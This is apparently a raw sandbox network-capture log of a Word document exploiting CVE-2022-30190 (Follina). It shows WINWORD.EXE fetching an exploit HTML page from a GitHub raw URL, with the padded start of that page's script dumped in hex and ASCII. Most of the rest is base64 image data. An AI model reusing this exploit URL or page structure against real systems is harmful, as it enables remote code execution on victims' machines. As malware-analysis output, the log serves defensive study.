                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC44INData Raw: 67 70 4c 58 47 48 72 69 57 63 32 6e 61 31 76 73 58 4c 31 36 38 72 73 6d 70 46 45 56 6e 46 79 34 64 5a 79 55 4c 62 45 68 62 5a 38 71 75 41 4e 39 6b 75 33 65 4a 6b 4f 6e 31 72 2f 2f 71 62 65 69 36 51 61 66 36 76 2f 49 6b 2b 67 71 46 4f 79 4e 55 73 4f 30 52 49 48 49 62 56 61 41 42 69 57 6e 36 30 6a 69 61 72 62 53 51 71 37 34 7a 4e 74 55 65 6a 6f 49 39 79 74 71 69 44 61 64 58 54 38 70 56 41 42 35 34 69 44 6d 38 71 76 50 71 34 58 53 6c 54 37 77 51 76 51 4e 45 46 45 63 47 41 77 31 72 42 59 74 5a 48 44 50 58 52 41 50 52 42 68 44 52 72 74 4d 4f 6a 6b 4c 2f 57 4a 73 38 78 4d 73 38 78 58 74 58 76 50 43 51 31 7a 2b 73 45 65 48 59 44 39 47 50 37 69 6b 67 63 75 33 51 71 46 6a 31 32 50 6f 68 43 30 58 41 71 63 6c 72 57 59 42 47 78 65 34 66 66 73 54 61 6f 68 32 54 6e 76
                                                                                                                                                                                                                                        Data Ascii: gpLXGHriWc2na1vsXL168rsmpFEVnFy4dZyULbEhbZ8quAN9ku3eJkOn1r//qbei6Qaf6v/Ik+gqFOyNUsO0RIHIbVaABiWn60jiarbSQq74zNtUejoI9ytqiDadXT8pVAB54iDm8qvPq4XSlT7wQvQNEFEcGAw1rBYtZHDPXRAPRBhDRrtMOjkL/WJs8xMs8xXtXvPCQ1z+sEeHYD9GP7ikgcu3QqFj12PohC0XAqclrWYBGxe4ffsTaoh2Tnv
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC46INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC46INData Raw: 35 35 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 55a
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC46INData Raw: 38 4f 50 75 6f 52 48 7a 77 4a 42 42 49 4c 52 50 30 70 68 63 57 39 63 55 31 4e 4f 4f 44 44 65 42 71 5a 38 71 77 6b 4f 71 39 41 33 33 68 58 6d 6f 35 65 42 54 4e 41 53 53 62 6e 58 49 33 54 49 48 70 59 62 42 39 5a 53 6e 77 73 63 47 41 44 31 59 6a 2f 74 55 7a 6a 34 56 4b 62 76 64 59 31 34 39 43 34 51 5a 64 42 78 76 35 64 58 78 62 6c 78 56 4f 48 6f 41 67 63 31 66 71 2b 2b 30 64 4f 2b 62 43 4f 4f 71 59 49 31 69 47 58 6f 33 63 4f 6a 52 34 47 6f 4b 34 35 79 32 32 67 38 33 39 7a 50 7a 56 4d 58 76 6a 41 64 33 2f 39 36 62 38 50 52 4c 62 6f 61 78 53 6f 50 75 73 64 36 39 44 41 51 35 57 43 42 78 34 49 79 49 43 37 54 63 66 78 52 52 75 56 48 70 32 2f 66 76 53 35 72 74 71 76 44 76 67 5a 74 4e 66 53 6f 65 36 78 48 37 77 4a 42 30 64 61 57 45 35 4e 68 51 4e 53 51 51 5a 65 66
                                                                                                                                                                                                                                        Data Ascii: 8OPuoRHzwJBBILRP0phcW9cU1NOODDeBqZ8qwkOq9A33hXmo5eBTNASSbnXI3TIHpYbB9ZSnwscGAD1Yj/tUzj4VKbvdY149C4QZdBxv5dXxblxVOHoAgc1fq++0dO+bCOOqYI1iGXo3cOjR4GoK45y22g839zPzVMXvjAd3/96b8PRLboaxSoPusd69DAQ5WCBx4IyIC7TcfxRRuVHp2/fvS5rtqvDvgZtNfSoe6xH7wJB0daWE5NhQNSQQZef
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC47INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC47INData Raw: 35 35 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 55a
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC47INData Raw: 31 41 30 4d 46 2f 36 6e 64 37 59 64 63 6a 44 75 63 2f 6d 51 59 33 51 78 6b 59 68 52 62 68 68 34 4d 44 49 34 43 78 61 52 69 30 65 4e 42 65 46 76 6e 2f 77 46 56 34 75 68 6a 4b 63 32 76 57 41 41 41 41 41 42 4a 52 55 35 45 72 6b 4a 67 67 67 3d 3d 22 3e 0d 0a 20 20 20 20 20 20 3c 2f 70 3e 0d 0a 0d 0a 20 20 20 20 20 20 3c 70 3e 3c 73 74 72 6f 6e 67 3e 54 68 65 20 72 65 71 75 65 73 74 20 6d 61 64 65 20 77 61 73 20 74 6f 20 66 6f 72 62 69 64 64 65 6e 20 63 6f 6e 74 65 6e 74 2e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 3c 70 3e 53 6f 72 72 79 20 61 62 6f 75 74 20 74 68 61 74 2e 20 50 6c 65 61 73 65 20 74 72 79 20 72 65 66 72 65 73 68 69 6e 67 20 61 6e 64 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 74 68 65 20 70 72 6f 62 6c 65 6d 20 70 65 72
                                                                                                                                                                                                                                        Data Ascii: 1A0MF/6nd7YdcjDuc/mQY3QxkYhRbhh4MDI4CxaRi0eNBeFvn/wFV4uhjKc2vWAAAAABJRU5ErkJggg=="> </p> <p><strong>The request made was to forbidden content.</strong></p> <p>Sorry about that. Please try refreshing and contact us if the problem per
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC49INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC49INData Raw: 61 62 34 0d 0a
                                                                                                                                                                                                                                        Data Ascii: ab4
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC49INData Raw: 7a 61 47 39 77 49 45 4e 54 4e 69 41 6f 54 57 46 6a 61 57 35 30 62 33 4e 6f 4b 53 49 67 65 47 31 77 54 55 30 36 53 57 35 7a 64 47 46 75 59 32 56 4a 52 44 30 69 65 47 31 77 4c 6d 6c 70 5a 44 70 46 4d 54 5a 43 52 44 59 33 52 45 49 7a 52 6a 41 78 4d 55 55 79 51 55 51 7a 52 45 49 78 51 7a 52 45 4e 55 46 46 4e 55 4d 35 4e 69 49 67 65 47 31 77 54 55 30 36 52 47 39 6a 64 57 31 6c 62 6e 52 4a 52 44 30 69 65 47 31 77 4c 6d 52 70 5a 44 70 46 4d 54 5a 43 52 44 59 33 52 55 49 7a 52 6a 41 78 4d 55 55 79 51 55 51 7a 52 45 49 78 51 7a 52 45 4e 55 46 46 4e 55 4d 35 4e 69 49 2b 49 44 78 34 62 58 42 4e 54 54 70 45 5a 58 4a 70 64 6d 56 6b 52 6e 4a 76 62 53 42 7a 64 46 4a 6c 5a 6a 70 70 62 6e 4e 30 59 57 35 6a 5a 55 6c 45 50 53 4a 34 62 58 41 75 61 57 6c 6b 4f 6b 55 78 4e 6b
                                                                                                                                                                                                                                        Data Ascii: zaG9wIENTNiAoTWFjaW50b3NoKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDpFMTZCRDY3REIzRjAxMUUyQUQzREIxQzRENUFFNUM5NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDpFMTZCRDY3RUIzRjAxMUUyQUQzREIxQzRENUFFNUM5NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOkUxNk
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC50INData Raw: 75 6f 34 62 30 37 46 42 61 4f 68 73 75 30 41 34 55 6e 63 2b 54 31 54 55 31 4e 6a 33 4b 73 53 53 45 35 79 4a 36 35 6a 71 46 32 44 44 64 38 51 71 57 59 6d 41 5a 72 49 4d 32 56 6c 5a 54 64 6e 5a 6d 62 36 41 62 70 64 56 39 56 36 65 63 39 7a 6e 66 35 51 37 48 6a 59 75 6d 64 52 45 30 4a 4f 70 33 4d 6a 69 74 4f 34 53 46 61 2b 63 5a 7a 38 55 6d 71 65 33 54 43 62 53 4c 76 64 66 6b 52 2f 6b 57 44 64 4e 51 6c 35 49 6e 75 54 63 79 73 4f 63 70 46 54 33 35 5a 72 62 42 78 78 34 70 33 4a 41 48 6c 5a 56 56 57 31 44 2f 36 33 34 56 52 74 2b 46 76 4c 42 67 4b 2f 76 35 4c 56 39 57 53 2b 31 30 78 4d 54 45 77 74 52 77 37 58 76 71 4f 4c 2b 65 32 51 38 56 33 41 59 49 4f 49 41 58 51 32 36 2f 68 65 57 56 6e 5a 43 56 66 63 79 4b 48 67 32 43 42 67 54 70 6d 50 6d 6a 59 4d 38 6c 32 34
                                                                                                                                                                                                                                        Data Ascii: uo4b07FBaOhsu0A4Unc+T1TU1Nj3KsSSE5yJ65jqF2DDd8QqWYmAZrIM2VlZTdnZmb6AbpdV9V6ec9znf5Q7HjYumdRE0JOp3MjitO4SFa+cZz8Umqe3TCbSLvdfkR/kWDdNQl5InuTcysOcpFT35ZrbBxx4p3JAHlZVVW1D/634VRt+FvLBgK/v5LV9WS+10xMTEwtRw7XvqOL+e2Q8V3AYIOIAXQ26/heWVnZCVfcyKHg2CBgTpmPmjYM8l24
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC51INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC51INData Raw: 61 62 34 0d 0a
                                                                                                                                                                                                                                        Data Ascii: ab4
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC51INData Raw: 7a 64 47 46 75 59 32 56 4a 52 44 30 69 65 47 31 77 4c 6d 6c 70 5a 44 70 45 51 55 4d 31 51 6b 55 78 52 55 49 30 4d 55 4d 78 4d 55 55 79 51 55 51 7a 52 45 49 78 51 7a 52 45 4e 55 46 46 4e 55 4d 35 4e 69 49 67 65 47 31 77 54 55 30 36 52 47 39 6a 64 57 31 6c 62 6e 52 4a 52 44 30 69 65 47 31 77 4c 6d 52 70 5a 44 70 45 51 55 4d 31 51 6b 55 78 52 6b 49 30 4d 55 4d 78 4d 55 55 79 51 55 51 7a 52 45 49 78 51 7a 52 45 4e 55 46 46 4e 55 4d 35 4e 69 49 2b 49 44 78 34 62 58 42 4e 54 54 70 45 5a 58 4a 70 64 6d 56 6b 52 6e 4a 76 62 53 42 7a 64 46 4a 6c 5a 6a 70 70 62 6e 4e 30 59 57 35 6a 5a 55 6c 45 50 53 4a 34 62 58 41 75 61 57 6c 6b 4f 6b 55 78 4e 6b 4a 45 4e 6a 64 47 51 6a 4e 47 4d 44 45 78 52 54 4a 42 52 44 4e 45 51 6a 46 44 4e 45 51 31 51 55 55 31 51 7a 6b 32 49 69
                                                                                                                                                                                                                                        Data Ascii: zdGFuY2VJRD0ieG1wLmlpZDpEQUM1QkUxRUI0MUMxMUUyQUQzREIxQzRENUFFNUM5NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDpEQUM1QkUxRkI0MUMxMUUyQUQzREIxQzRENUFFNUM5NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOkUxNkJENjdGQjNGMDExRTJBRDNEQjFDNEQ1QUU1Qzk2Ii
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC53INData Raw: 50 46 78 5a 79 71 52 70 58 41 52 47 2f 59 4f 72 31 4f 62 46 4a 30 67 55 73 6b 58 42 62 61 6d 63 52 31 4f 4b 6d 4d 55 76 44 78 48 52 41 75 38 2f 4c 6d 59 33 6a 46 4c 4d 55 70 46 71 7a 39 48 78 47 36 35 73 6d 59 4a 64 79 4b 79 45 43 4f 78 44 69 45 41 65 2f 70 31 67 6a 46 32 6f 6f 6e 69 76 5a 41 73 78 56 67 6c 32 64 61 61 34 45 51 57 43 57 36 4a 35 35 71 46 41 46 46 5a 69 4a 57 59 4c 78 4e 51 79 32 71 4f 53 55 7a 47 52 73 79 58 43 55 44 49 65 6c 69 77 41 48 45 4f 34 57 53 6c 57 51 42 52 46 6f 5a 61 6b 58 63 4b 6d 43 58 6d 79 58 41 4b 73 30 56 65 39 76 6c 38 71 34 32 57 6f 49 59 70 4a 55 34 68 56 33 68 4b 63 4e 73 38 6d 39 67 6c 37 70 2f 78 51 37 33 65 46 35 6b 42 34 6a 35 6d 4e 72 57 6d 54 4a 52 4e 77 41 7a 71 69 56 31 43 78 6a 56 54 5a 43 49 6b 45 71 2b 5a
                                                                                                                                                                                                                                        Data Ascii: PFxZyqRpXARG/YOr1ObFJ0gUskXBbamcR1OKmMUvDxHRAu8/LmY3jFLMUpFqz9HxG65smYJdyKyECOxDiEAe/p1gjF2oonivZAsxVgl2daa4EQWCW6J55qFAFFZiJWYLxNQy2qOSUzGRsyXCUDIeliwAHEO4WSlWQBRFoZakXcKmCXmyXAKs0Ve9vl8q42WoIYpJU4hV3hKcNs8m9gl7p/xQ73eF5kB4j5mNrWmTJRNwAzqiV1CxjVTZCIkEq+Z
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC54INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC54INData Raw: 31 37 66 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 17f
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC54INData Raw: 51 45 6b 4c 2b 63 44 4d 53 6f 4c 76 5a 6f 32 66 51 42 37 41 4a 73 73 4e 41 75 46 75 76 6f 72 6c 44 56 56 6b 6b 67 32 49 38 37 2b 6a 6f 32 4b 32 51 41 56 70 68 44 72 66 79 56 69 4b 35 56 71 74 4f 33 34 4f 6b 61 78 58 43 70 2b 37 64 72 64 44 42 43 41 64 75 62 6d 36 65 69 64 58 2b 32 57 77 71 54 35 6b 6f 6d 77 68 34 59 51 4c 6b 2b 48 34 61 45 39 33 68 38 58 67 32 67 76 48 65 6b 51 5a 4f 47 53 67 4c 5a 54 4c 79 44 54 4c 4a 34 4c 78 39 2f 4b 5a 57 4b 42 53 61 69 6e 54 34 49 79 33 46 71 51 42 66 6e 55 5a 52 34 32 50 4b 51 46 6b 73 42 72 39 51 4b 56 58 43 50 75 73 44 33 4f 69 41 2f 52 6b 51 35 6b 50 38 71 56 2f 4a 6c 31 57 79 77 41 70 2f 36 2b 64 63 6d 50 4d 32 7a 4c 31 55 72 55 61 68 65 34 4a 71 66 6e 57 57 4b 58 49 75 6c 33 75 55 62 66 50 38 6e 6a 41 46 4c 57
                                                                                                                                                                                                                                        Data Ascii: QEkL+cDMSoLvZo2fQB7AJssNAuFuvorlDVVkkg2I87+jo2K2QAVphDrfyViK5VqtO34OkaxXCp+7drdDBCAdubm6eidX+2WwqT5komwh4YQLk+H4aE93h8Xg2gvHekQZOGSgLZTLyDTLJ4Lx9/KZWKBSainT4Iy3FqQBfnUZR42PKQFksBr9QKVXCPusD3OiA/RkQ5kP8qV/Jl1WywAp/6+dcmPM2zL1UrUahe4JqfnWWKXIul3uUbfP8njAFLW
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC54INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        1192.168.2.449705185.199.108.133443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC54OUTHEAD /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Authorization: Bearer
                                                                                                                                                                                                                                        User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                                                                        X-Office-Major-Version: 16
                                                                                                                                                                                                                                        X-MS-CookieUri-Requested: t
                                                                                                                                                                                                                                        X-FeatureVersion: 1
                                                                                                                                                                                                                                        X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC55INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Length: 14
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:05 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6939-MXP
                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                        X-Timer: S1660787826.732014,VS0,VE121
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: b9594ed1c6d167616f9ea3a4eaa3aa878f0b48f7
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:05 GMT
                                                                                                                                                                                                                                        Source-Age: 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        10192.168.2.449714185.199.109.133443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC96OUTHEAD /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
                                                                                                                                                                                                                                        Authorization: Bearer
                                                                                                                                                                                                                                        X-MS-CookieUri-Requested: t
                                                                                                                                                                                                                                        X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                                                        User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC97INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Length: 14
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:10 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6941-MXP
                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                                                                                                                        X-Timer: S1660787831.680249,VS0,VE0
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: 9cc769d5c6e06fa7a2b3dd1d9f39dd18e6512588
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:10 GMT
                                                                                                                                                                                                                                        Source-Age: 5


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        11192.168.2.449715185.199.109.133443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC97OUTGET /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC98INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Length: 8226
                                                                                                                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        ETag: "e354a911960708e3440f84ea636df58339a30e9db3fd96e7dc79f2ba014824d1"
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        X-GitHub-Request-Id: 7924:06B9:51884D:55A9F9:62FD9C75
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:10 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6923-MXP
                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                                                                                                                        X-Timer: S1660787831.765353,VS0,VE0
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: 28995a98776a1c9190877e70937313332b41e765
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:10 GMT
                                                                                                                                                                                                                                        Source-Age: 1
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC99INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 45 78 70 6c 6f 69 74 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2f 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 44 56 44 56 44 56 0d 0a 2f 2f 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 44 56 44 56 44 56 0d 0a 2f 2f 42 42 42 42 42 42 42 42 42
                                                                                                                                                                                                                                        Data Ascii: <!doctype html><html lang="en"><head><title>Exploit</title></head><body><script>//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV//BBBBBBBBB
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC100INData Raw: 42 42 42 42 42 42 42 42 42 42 44 56 44 56 44 56 0d 0a 2f 2f 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 44 56 44 56 44 56 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                        Data Ascii: BBBBBBBBBBDVDVDV//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC101INData Raw: 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                        Data Ascii: AAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC103INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
